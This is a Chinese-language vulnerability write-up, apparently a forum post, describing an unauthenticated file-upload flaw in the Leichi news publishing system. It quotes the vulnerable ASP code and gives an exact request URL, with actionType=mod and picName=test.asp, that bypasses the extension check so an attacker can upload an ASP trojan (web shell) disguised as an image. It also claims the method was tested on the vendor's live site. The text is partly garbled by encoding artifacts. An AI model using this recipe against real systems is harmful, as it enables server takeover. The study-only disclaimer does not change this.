声明：破绽为focn[BCT]首先发现，版权归破绽发现者focn所有，转载请保持文章完整，并注明出处！本文章只做学习研究用，任何人用于其他非法用途本人不负担任何责任！ 作者：黑萝卜系统： 雷驰新闻公布治理系统版本： 当前任何版本破绽形貌：1 在admin文件夹下的uploadPic.inc.asp中，没有对接见权限举行限制，随便用户都可 以 接见到此文件。随便用户都可以使用此文件上传文件到服务器 2 uploadPic.inc.asp中虽然对上传文件的后缀名举行了限制然则可以绕过。请看代码！ if file.FileSizegt;0 then ''若是 FileSize gt; 0 说明有文件数据 '天生图片名字 if actionType= "mod" then remFileName = Right(picName,len(picName)-InstrRev(picName,"/")) else if editRemNumlt;gt;"" then remNum = editRemNum else Randomize remNum = Int(( - 1 + 1) * Rnd + 1)amp;day(date)amp;month(date)amp;year(date)amp;hour(time)amp;minute(time)amp;second(time) end if remFileName = remNumamp;"_"amp;(editImageNum+1)amp;".gif" end if file.SaveAs Server.mappath(formPathamp;remFileName) ''保留文件 gt; 要害的是 if actionType= "mod" then remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))只要自己组织actionType= "mod" 就可以饶过下面的文件名检测上传ASP文件组织如下UPLhttp://localhost/leichinews/admin/uploadPic.asp?actionType=modamp;picName=test.asp然后在上传文件内里填要传的图片格式的ASP木马就可以在uppic目录下上传文件名为test.asp的文件 本方式在雷驰官方网站上测试通过！·再次希望人人不要用于非法用途！！